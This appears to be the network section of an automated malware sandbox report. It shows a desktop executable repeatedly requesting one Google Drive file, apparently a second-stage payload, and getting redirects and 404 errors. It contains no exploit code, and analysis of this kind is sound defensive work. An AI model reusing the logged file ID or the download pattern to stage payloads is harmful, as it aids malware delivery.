                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                39 | 192.168.2.9 | 49750 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:43 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:44 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC7125rOZLJkYAqH8_XKGSO2hw7V0L9VCcFcVvxFd8uVpRpSZdF2dRRxbqW7RExbNDqf_JQbmfY
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:44 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-M_LpJyStBhvDr60Aj4d1Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:44 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VdR5cfkty-ANaoZiDbTT-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                40 | 192.168.2.9 | 49751 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:45 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:45 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:45 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-DlRLId_q7s6e9deAyhmkdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                41 | 192.168.2.9 | 49752 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:46 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:46 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC59DtgYvImoCUKpyOJU2rryNrML5FTqWHMjclJN9zXFuh_MCf1rm8kDb1enhwRX5yh8
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:46 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-XPYyQiHb1P7pQwGqRObfHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:46 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eokZYBG02kY2ftvsaHXmQQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                42 | 192.168.2.9 | 49753 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:47 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:47 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:47 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: script-src 'nonce-fPI3DFTEiPTX_ZcVXL-F6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                43 | 192.168.2.9 | 49754 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:48 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:48 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgRDxVkgOpnc0PBTqVzi6X0AXzLturf9v2kFRWkZMCWLo_Z9KymZu6CpimXuaGXhStNI
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:48 GMT
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-cIFQRqOBdjigvFZ33GPdsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:48 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k3nPriCnH1gpsLFvebyCpA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                44 | 192.168.2.9 | 49755 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:49 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:49 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:49 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-ZF5be2McWXsvPsdlpLnrnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                45 | 192.168.2.9 | 49756 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:50 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:51 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC4f8Wtqto45LfB1nbQ3PuH4OXaE-abP7oJC7D9S3u8kcFKteExGw4FJYR75LIFOloQjlWTqXpY
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:50 GMT
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-JZFswajyLKWTVY-3qOK1QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:51 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g1MiEOmh8gJjmhcdIaGoAA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                46 | 192.168.2.9 | 49757 | 142.250.184.206 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:51 UTC | 421 | OUT | GET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:52 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:52 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-osBM1xRgD5V_ZweOXtZriw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                47 | 192.168.2.9 | 49758 | 216.58.206.33 | 443 | 5680 | C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-01-10 14:55:52 UTC | 463 | OUT | GET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:53 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTYip5M0JUxyx7NsM8LZNljfWbw4L8XjNPfjc2qzBHCBnzOX8uQWcS_ZnEfVM4aPaZCF1D8mU8
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:53 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-8roJ9Na603LJq4vYRZHJfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
